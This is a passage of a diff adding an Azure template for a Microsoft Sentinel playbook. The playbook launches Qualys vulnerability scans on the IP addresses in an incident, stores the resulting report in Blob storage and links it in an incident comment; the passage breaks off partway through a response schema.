"description": "QualysVM-LaunchVMScan-GenerateReport Playbook with template version 3.0.0", + "mainTemplate": { + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "[variables('playbookVersion5')]", + "parameters": { + "PlaybookName": { + "defaultValue": "QualysVM-LaunchVMScan-GenerateReport", + "type": "string", + "metadata": { + "description": "Name of the logic app resource to be created." + } + }, + "CustomConnectorName": { + "defaultValue": "QualysCustomConnector", + "type": "string", + "metadata": { + "description": "Name of the logic app connector which performs Qualys actions." + } + }, + "StorageAccountName": { + "defaultValue": "", + "type": "string", + "metadata": { + "description": "Name of the storage account to store Qualys reports." + } + } + }, + "variables": { + "QualyscustomconnectorConnectionName": "[[concat('Qualyscustomconnector-', parameters('PlaybookName'))]", + "AzureBlobStorageName": "[[parameters('StorageAccountName')]", + "AzureblobConnectionName": "[[concat('Azureblob-', parameters('PlaybookName'))]", + "MicrosoftSentinelConnectionName": "[[concat('MicrosoftSentinel-', parameters('PlaybookName'))]", + "StorageAccountId": "[[resourceId('Microsoft.Storage/storageAccounts', variables('AzureBlobStorageName'))]", + "connection-2": "[[concat('/subscriptions/', subscription().subscriptionId, '/resourceGroups/', resourceGroup().name, '/providers/Microsoft.Web/customApis/', parameters('CustomConnectorName'))]", + "_connection-2": "[[variables('connection-2')]", + "connection-3": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azureblob')]", + "_connection-3": "[[variables('connection-3')]", + "connection-4": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azuresentinel')]", + 
"_connection-4": "[[variables('connection-4')]", + "workspace-location-inline": "[concat('[resourceGroup().locatio', 'n]')]", + "workspace-name": "[parameters('workspace')]", + "workspaceResourceId": "[[resourceId('microsoft.OperationalInsights/Workspaces', variables('workspace-name'))]" + }, + "resources": [ + { + "properties": { + "provisioningState": "Succeeded", + "state": "Enabled", + "definition": { + "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "$connections": { + "type": "Object" + } + }, + "staticResults": { + "Download_Scan_Report0": { + "status": "Succeeded", + "outputs": { + "statusCode": "OK" + } + } + }, + "triggers": { + "Microsoft_Sentinel_incident": { + "type": "ApiConnectionWebhook", + "inputs": { + "body": { + "callback_url": "@{listCallbackUrl()}" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "path": "/incident-creation" + } + } + }, + "actions": { + "Add_comment_to_incident_(V3)": { + "runAfter": { + "Append_Report_Url_to_Incident_Comment_": [ + "Succeeded", + "Skipped" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": { + "incidentArmId": "@triggerBody()?['object']?['id']", + "message": "

@{variables('IncidentComment')}

" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "method": "post", + "path": "/Incidents/Comment" + } + }, + "Append_Report_Url_to_Incident_Comment_": { + "runAfter": { + "Compose_Comment": [ + "Succeeded" + ] + }, + "type": "AppendToStringVariable", + "inputs": { + "name": "IncidentComment", + "value": "@outputs('Compose_Comment')" + } + }, + "Check_if_there_is_any_IP_Address_to_Scan": { + "actions": { + "Check_if_Scanner_is_available_then_Run_Scan": { + "actions": { + "Check_Scan_Status": { + "runAfter": { + "Get_Scan_Reference": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/scan/", + "queries": { + "action": "list", + "scan_ref": "@variables('ScanRef')" + } + } + }, + "Get_Scan_Reference": { + "foreach": "@body('Parse_Launch_Scan_Output')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']", + "actions": { + "Check_for_Scan_Reference": { + "actions": { + "Set_variable_-_ScanRef": { + "type": "SetVariable", + "inputs": { + "name": "ScanRef", + "value": "@items('Get_Scan_Reference')?['VALUE']" + } + } + }, + "expression": { + "and": [ + { + "equals": [ + "@items('Get_Scan_Reference')?['KEY']", + "REFERENCE" + ] + } + ] + }, + "type": "If" + } + }, + "runAfter": { + "Parse_Launch_Scan_Output": [ + "Succeeded" + ] + }, + "type": "Foreach" + }, + "Launch_Scan": { + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/scan/", + "queries": { + "action": "launch", + "ip": "@{join(variables('IPAddrToScan'), ',')}", + "iscanner_name": "@variables('Scanner')", + 
"option_id": "@body('Parse_Create_Option_Profile_Output')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE']", + "scan_title": "@{concat('SentinelAdHoc_', utcNow())}" + } + } + }, + "Parse_Check_Scan_Status_Output": { + "runAfter": { + "Check_Scan_Status": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Check_Scan_Status')))", + "schema": { + "properties": { + "SCAN_LIST_OUTPUT": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "SCAN_LIST": { + "properties": { + "SCAN": { + "properties": { + "DURATION": { + "type": "string" + }, + "LAUNCH_DATETIME": { + "type": "string" + }, + "PROCESSED": { + "type": "string" + }, + "PROCESSING_PRIORITY": { + "type": "string" + }, + "REF": { + "type": "string" + }, + "STATUS": { + "properties": { + "STATE": { + "type": "string" + } + }, + "type": "object" + }, + "TARGET": { + "properties": { + "__cdata": { + "type": "string" + } + }, + "type": "object" + }, + "TITLE": { + "properties": { + "__cdata": { + "type": "string" + } + }, + "type": "object" + }, + "TYPE": { + "type": "string" + }, + "USER_LOGIN": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Parse_Launch_Scan_Output": { + "runAfter": { + "Launch_Scan": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Launch_Scan')))", + "schema": { + "properties": { + "SIMPLE_RETURN": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "ITEM_LIST": { + "properties": { + "ITEM": { + "items": { + "properties": { + "KEY": { + "type": "string" + }, + "VALUE": { + "type": "string" + } + }, + "required": [ + "KEY", + "VALUE" + ], + "type": "object" + }, + "type": "array" + } + }, + "type": "object" + }, + "TEXT": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": 
"object" + } + }, + "type": "object" + } + } + }, + "Set_variable_-_ScanStatus": { + "runAfter": { + "Parse_Check_Scan_Status_Output": [ + "Succeeded" + ] + }, + "type": "SetVariable", + "inputs": { + "name": "ScanStatus", + "value": "@body('Parse_Check_Scan_Status_Output')?['SCAN_LIST_OUTPUT']?['RESPONSE']?['SCAN_LIST']?['SCAN']?['STATUS']?['STATE']" + } + }, + "Wait_Until_Scan_is_finished": { + "actions": { + "Check_Scan_Status_Again": { + "runAfter": { + "Sleep_for_5_minutes": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/scan/", + "queries": { + "action": "list", + "scan_ref": "@variables('ScanRef')" + } + } + }, + "Parse_Check_Scan_Status_Output_Again": { + "runAfter": { + "Check_Scan_Status_Again": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Check_Scan_Status_Again')))", + "schema": { + "properties": { + "SCAN_LIST_OUTPUT": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "SCAN_LIST": { + "properties": { + "SCAN": { + "properties": { + "DURATION": { + "type": "string" + }, + "LAUNCH_DATETIME": { + "type": "string" + }, + "PROCESSED": { + "type": "string" + }, + "PROCESSING_PRIORITY": { + "type": "string" + }, + "REF": { + "type": "string" + }, + "STATUS": { + "properties": { + "STATE": { + "type": "string" + } + }, + "type": "object" + }, + "TARGET": { + "properties": { + "__cdata": { + "type": "string" + } + }, + "type": "object" + }, + "TITLE": { + "properties": { + "__cdata": { + "type": "string" + } + }, + "type": "object" + }, + "TYPE": { + "type": "string" + }, + "USER_LOGIN": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": 
"object" + } + } + }, + "Set_variable": { + "runAfter": { + "Parse_Check_Scan_Status_Output_Again": [ + "Succeeded" + ] + }, + "type": "SetVariable", + "inputs": { + "name": "ScanStatus", + "value": "@body('Parse_Check_Scan_Status_Output_Again')?['SCAN_LIST_OUTPUT']?['RESPONSE']?['SCAN_LIST']?['SCAN']?['STATUS']?['STATE']" + } + }, + "Sleep_for_5_minutes": { + "type": "Wait", + "inputs": { + "interval": { + "count": 2, + "unit": "Minute" + } + } + } + }, + "runAfter": { + "Set_variable_-_ScanStatus": [ + "Succeeded" + ] + }, + "expression": "@equals(variables('ScanStatus'), 'Finished')", + "limit": { + "count": 60, + "timeout": "PT1H" + }, + "type": "Until" + } + }, + "runAfter": { + "Find_Available_Scanner_": [ + "Succeeded" + ] + }, + "else": { + "actions": { + "Append_to_Incident_Comment_if_no_Scanner_is_online": { + "type": "AppendToStringVariable", + "inputs": { + "name": "IncidentComment", + "value": "No Online Scanner available to launch scan.\n" + } + } + } + }, + "expression": { + "and": [ + { + "not": { + "equals": [ + "@variables('Scanner')", + null + ] + } + } + ] + }, + "type": "If" + }, + "Create_Option_Profile_for_Scan": { + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/subscription/option_profile/vm/", + "queries": { + "action": "create", + "basic_information_gathering": "all", + "map_tcp_ports_additional": "1", + "map_udp_ports_additional": "1", + "scan_tcp_ports": "full", + "scan_udp_ports": "full", + "title": "@{concat('ScanOptionProfile_', utcNow())}", + "vulnerability_detection": "complete" + } + } + }, + "Find_Available_Scanner_": { + "foreach": "@body('Parse_List_Scanner_Appliance_Output')?['APPLIANCE_LIST_OUTPUT']?['RESPONSE']?['APPLIANCE_LIST']?['APPLIANCE']", + "actions": { + "Check_Scanner_Status": { + "actions": { + 
"Set_variable_-_Scanner": { + "type": "SetVariable", + "inputs": { + "name": "Scanner", + "value": "@items('Find_Available_Scanner_')?['NAME']" + } + } + }, + "expression": { + "and": [ + { + "equals": [ + "@items('Find_Available_Scanner_')?['STATUS']", + "Online" + ] + } + ] + }, + "type": "If" + } + }, + "runAfter": { + "Parse_List_Scanner_Appliance_Output": [ + "Succeeded" + ] + }, + "type": "Foreach" + }, + "List_Scanner_Appliances": { + "runAfter": { + "Parse_Create_Option_Profile_Output": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "get", + "path": "/api/2.0/fo/appliance/", + "queries": { + "action": "list" + } + } + }, + "Parse_Create_Option_Profile_Output": { + "runAfter": { + "Create_Option_Profile_for_Scan": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Create_Option_Profile_for_Scan')))", + "schema": { + "properties": { + "!DOCTYPE": { + "properties": { + "@@name": { + "type": "string" + }, + "@@system": { + "type": "string" + } + }, + "type": "object" + }, + "?xml": { + "properties": { + "@@encoding": { + "type": "string" + }, + "@@version": { + "type": "string" + } + }, + "type": "object" + }, + "SIMPLE_RETURN": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "ITEM_LIST": { + "properties": { + "ITEM": { + "properties": { + "KEY": { + "type": "string" + }, + "VALUE": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "TEXT": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Parse_List_Scanner_Appliance_Output": { + "runAfter": { + "List_Scanner_Appliances": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": 
"@json(xml(body('List_Scanner_Appliances')))", + "schema": { + "properties": { + "APPLIANCE_LIST_OUTPUT": { + "properties": { + "RESPONSE": { + "properties": { + "APPLIANCE_LIST": { + "properties": { + "APPLIANCE": { + "items": { + "properties": { + "ID": { + "type": "string" + }, + "NAME": { + "type": "string" + }, + "RUNNING_SCAN_COUNT": { + "type": "string" + }, + "RUNNING_SLICES_COUNT": { + "type": "string" + }, + "SOFTWARE_VERSION": { + "type": "string" + }, + "STATUS": { + "type": "string" + }, + "UUID": { + "type": "string" + } + }, + "required": [ + "ID", + "UUID", + "NAME", + "SOFTWARE_VERSION", + "RUNNING_SLICES_COUNT", + "RUNNING_SCAN_COUNT", + "STATUS" + ], + "type": "object" + }, + "type": "array" + } + }, + "type": "object" + }, + "DATETIME": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + } + }, + "runAfter": { + "For_each_IP_Address": [ + "Succeeded" + ] + }, + "else": { + "actions": { + "Append_to_Incident_Comment_If_no_IP_for_a_new_scan": { + "type": "AppendToStringVariable", + "inputs": { + "name": "IncidentComment", + "value": "No IP to launch a new scan.\n" + } + } + } + }, + "expression": { + "and": [ + { + "not": { + "equals": [ + "@length(variables('IPAddrToScan'))", + 0 + ] + } + } + ] + }, + "type": "If" + }, + "Compose_Comment": { + "runAfter": { + "Create_SAS_URI_by_path_(V2)": [ + "Succeeded" + ] + }, + "type": "Compose", + "inputs": "Following Qualys VM Scan Report Generated: @{body('Create_SAS_URI_by_path_(V2)')?['WebUrl']}\n" + }, + "Create_SAS_URI_by_path_(V2)": { + "runAfter": { + "Create_blob_(V2)": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": { + "Permissions": "Read" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azureblob']['connectionId']" + } + }, + "method": "post", + "path": "/v2/datasets/@{encodeURIComponent('AccountNameFromSettings')}/CreateSharedLinkByPath", + "queries": { + "path": 
"@body('Create_blob_(V2)')?['Path']" + } + } + }, + "Create_Scan_Report_Template": { + "runAfter": { + "Check_if_there_is_any_IP_Address_to_Scan": [ + "Succeeded", + "TimedOut" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": "\n\n\t\n\t\t<INFO key=\"title\">\n\t\t\t<![CDATA[@{concat('SentinelScanReportTemplate_', utcNow())}]]>\n\t\t</INFO>\n\t\n\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\n\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\n\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\n\t\n\t\t\n\t\t\t\n\t\t\n\t\n", + "headers": { + "Content-Type": "text/xml", + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/template/scan/", + "queries": { + "action": "create", + "report_format": "xml" + } + } + }, + "Create_blob_(V2)": { + "runAfter": { + "Download_Scan_Report": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": "@body('Download_Scan_Report')", + "headers": { + 
"ReadFileMetadataFromServer": true + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azureblob']['connectionId']" + } + }, + "method": "post", + "path": "/v2/datasets/@{encodeURIComponent(encodeURIComponent('AccountNameFromSettings'))}/files", + "queries": { + "folderPath": "/report-blob", + "name": "@{concat('ScanReport_', utcNow())}", + "queryParametersSingleEncoded": true + } + }, + "runtimeConfiguration": { + "contentTransfer": { + "transferMode": "Chunked" + } + } + }, + "Delay_1_Minute": { + "runAfter": { + "Parse_Launch_Scan_Report_Output": [ + "Succeeded" + ] + }, + "type": "Wait", + "inputs": { + "interval": { + "count": 1, + "unit": "Minute" + } + } + }, + "Delete_Option_Profile": { + "runAfter": { + "Add_comment_to_incident_(V3)": [ + "Succeeded", + "TimedOut", + "Skipped", + "Failed" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/subscription/option_profile/vm/", + "queries": { + "action": "delete", + "id": "@body('Parse_Launch_Scan_Report_Output')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE']" + } + } + }, + "Delete_Scan_Report_Template": { + "runAfter": { + "Delete_Option_Profile": [ + "Succeeded", + "TimedOut", + "Skipped", + "Failed" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "Content-Type": "text/xml", + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/template/scan/", + "queries": { + "action": "delete", + "template_id": "@body('Parse_Scan_Report_Template_Output')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE']" + } + } + }, + "Download_Scan_Report": { + "runAfter": { + 
"Wait_Until_Report_Generation_is_Finished": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/", + "queries": { + "action": "fetch", + "id": "@body('Parse_Launch_Scan_Report_Output')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE']" + } + }, + "runtimeConfiguration": { + "staticResult": { + "staticResultOptions": "Disabled", + "name": "Download_Scan_Report0" + } + } + }, + "Entities_-_Get_IPs": { + "type": "ApiConnection", + "inputs": { + "body": "@triggerBody()?['object']?['properties']?['relatedEntities']", + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "method": "post", + "path": "/entities/ip" + } + }, + "For_each_IP_Address": { + "foreach": "@body('Entities_-_Get_IPs')?['IPs']", + "actions": { + "Append_to_IP_Address_List": { + "runAfter": { + "Get_Asset_Details_By_IP": [ + "Succeeded" + ] + }, + "type": "AppendToArrayVariable", + "inputs": { + "name": "IPAddresses", + "value": "@items('For_each_IP_Address')?['Address']" + } + }, + "Check_if_Asset_Scanned_in_last_24_Hours": { + "actions": { + "List_of_IP_Addresses_to_Scan": { + "type": "AppendToArrayVariable", + "inputs": { + "name": "IPAddrToScan", + "value": "@items('For_each_IP_Address')?['Address']" + } + } + }, + "runAfter": { + "Parse_Asset_Details": [ + "Succeeded" + ] + }, + "else": { + "actions": { + "Check_if_IP_is_configured_for_scanning": { + "actions": { + "Append_to_Incident_Comment": { + "type": "AppendToStringVariable", + "inputs": { + "name": "IncidentComment", + "value": "@{items('For_each_IP_Address')?['Address']} IP Address is not configured for scanning.\n" + } + } + }, + "expression": { + "and": [ + { + "equals": [ + 
"@body('Parse_Asset_Details')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['LAST_VM_SCANNED_DATE']", + null + ] + } + ] + }, + "type": "If" + } + } + }, + "expression": { + "and": [ + { + "not": { + "equals": [ + "@body('Parse_Asset_Details')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['LAST_VM_SCANNED_DATE']", + null + ] + } + }, + { + "less": [ + "@body('Parse_Asset_Details')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['LAST_VM_SCANNED_DATE']", + "@subtractFromTime(utcNow(), 24, 'Hour')" + ] + } + ] + }, + "type": "If", + "description": "rtrert" + }, + "Get_Asset_Details_By_IP": { + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/asset/host/", + "queries": { + "action": "list", + "details": "All", + "ips": "@items('For_each_IP_Address')?['Address']" + } + } + }, + "Parse_Asset_Details": { + "runAfter": { + "Append_to_IP_Address_List": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(base64ToString(body('Get_Asset_Details_By_IP')?['$content'])))", + "schema": { + "properties": { + "HOST_LIST_OUTPUT": { + "properties": { + "REQUEST": { + "properties": { + "DATETIME": { + "type": [ + "object", + "string", + "null" + ] + }, + "PARAM_LIST": { + "properties": { + "PARAM": { + "properties": { + "KEY": { + "type": [ + "object", + "string", + "null" + ] + }, + "VALUE": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + }, + "POST_DATA": { + "type": [ + "object", + "string", + "null" + ] + }, + "RESOURCE": { + "type": [ + "object", + "string", + "null" + ] + }, + "USER_LOGIN": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + }, + "RESPONSE": { + "properties": { + "DATETIME": { + "type": [ + "object", + 
"string", + "null" + ] + }, + "GLOSSARY": { + "properties": { + "ASSET_GROUP_LIST": { + "properties": { + "ASSET_GROUP": { + "properties": { + "ID": { + "type": [ + "object", + "string", + "null" + ] + }, + "TITLE": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + }, + "USER_DEF": { + "properties": { + "LABEL_1": { + "type": [ + "object", + "string", + "null" + ] + }, + "LABEL_2": { + "type": [ + "object", + "string", + "null" + ] + }, + "LABEL_3": { + "type": [ + "object", + "string", + "null" + ] + }, + "VALUE_1": { + "properties": { + "__text": { + "type": [ + "object", + "string", + "null" + ] + }, + "_ud_attr": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + }, + "VALUE_2": { + "properties": { + "__text": { + "type": [ + "object", + "string", + "null" + ] + }, + "_ud_attr": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + }, + "VALUE_3": { + "properties": { + "__text": { + "type": [ + "object", + "string", + "null" + ] + }, + "_ud_attr": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + }, + "USER_LIST": { + "properties": { + "USER": { + "properties": { + "FIRST_NAME": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_NAME": { + "type": [ + "object", + "string", + "null" + ] + }, + "USER_LOGIN": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "HOST_LIST": { + "properties": { + "HOST": { + "properties": { + "ARS_FACTORS": { + "properties": { + "ARS_FORMULA": { + "type": [ + "object", + "string", + "null" + ] + }, + "VULN_COUNT": { + "properties": { + "__text": { + "type": [ + "object", + "string", + "null" + ] + }, + "_qds_severity": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + }, + "ASSET_CRITICALITY_SCORE": { 
+ "type": [ + "object", + "string", + "null" + ] + }, + "ASSET_GROUP_IDS": { + "type": [ + "object", + "string", + "null" + ] + }, + "ASSET_ID": { + "type": [ + "object", + "string", + "null" + ] + }, + "ASSET_RISK_SCORE": { + "type": [ + "object", + "string", + "null" + ] + }, + "CLOUD_PROVIDER": { + "type": [ + "object", + "string", + "null" + ] + }, + "CLOUD_PROVIDER_TAGS": { + "properties": { + "CLOUD_TAG": { + "properties": { + "LAST_SUCCESS_DATE": { + "type": [ + "object", + "string", + "null" + ] + }, + "NAME": { + "type": [ + "object", + "string", + "null" + ] + }, + "VALUE": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + }, + "CLOUD_RESOURCE_ID": { + "type": [ + "object", + "string", + "null" + ] + }, + "CLOUD_SERVICE": { + "type": [ + "object", + "string", + "null" + ] + }, + "COMMENTS": { + "type": [ + "object", + "string", + "null" + ] + }, + "DNS": { + "type": [ + "object", + "string", + "null" + ] + }, + "DNS_DATA": { + "properties": { + "DOMAIN": { + "type": [ + "object", + "string", + "null" + ] + }, + "FQDN": { + "type": [ + "object", + "string", + "null" + ] + }, + "HOSTNAME": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + }, + "EC2_INSTANCE_ID": { + "type": [ + "object", + "string", + "null" + ] + }, + "ID": { + "type": [ + "object", + "string", + "null" + ] + }, + "IP": { + "type": [ + "object", + "string", + "null" + ] + }, + "IPV6": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_COMPLIANCE_SCAN_DATETIME": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_SCAP_SCAN_DATETIME": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_VM_AUTH_SCANNED_DATE": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_VM_AUTH_SCANNED_DURATION": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_VM_SCANNED_DATE": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_VM_SCANNED_DURATION": { + 
"type": [ + "object", + "string", + "null" + ] + }, + "LAST_VULN_SCAN_DATETIME": { + "type": [ + "object", + "string", + "null" + ] + }, + "METADATA": { + "properties": { + "AZURE": { + "properties": { + "ATTRIBUTE": { + "properties": { + "LAST_ERROR": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_ERROR_DATE": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_STATUS": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_SUCCESS_DATE": { + "type": [ + "object", + "string", + "null" + ] + }, + "NAME": { + "type": [ + "object", + "string", + "null" + ] + }, + "VALUE": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + }, + "EC2": { + "properties": { + "ATTRIBUTE": { + "properties": { + "LAST_ERROR": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_ERROR_DATE": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_STATUS": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_SUCCESS_DATE": { + "type": [ + "object", + "string", + "null" + ] + }, + "NAME": { + "type": [ + "object", + "string", + "null" + ] + }, + "VALUE": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + }, + "GOOGLE": { + "properties": { + "ATTRIBUTE": { + "properties": { + "LAST_ERROR": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_ERROR_DATE": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_STATUS": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_SUCCESS_DATE": { + "type": [ + "object", + "string", + "null" + ] + }, + "NAME": { + "type": [ + "object", + "string", + "null" + ] + }, + "VALUE": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "NETBIOS": { + "type": [ + "object", + "string", + "null" + ] + }, + "NETWORK_ID": { + "type": [ + "object", + "string", + "null" + 
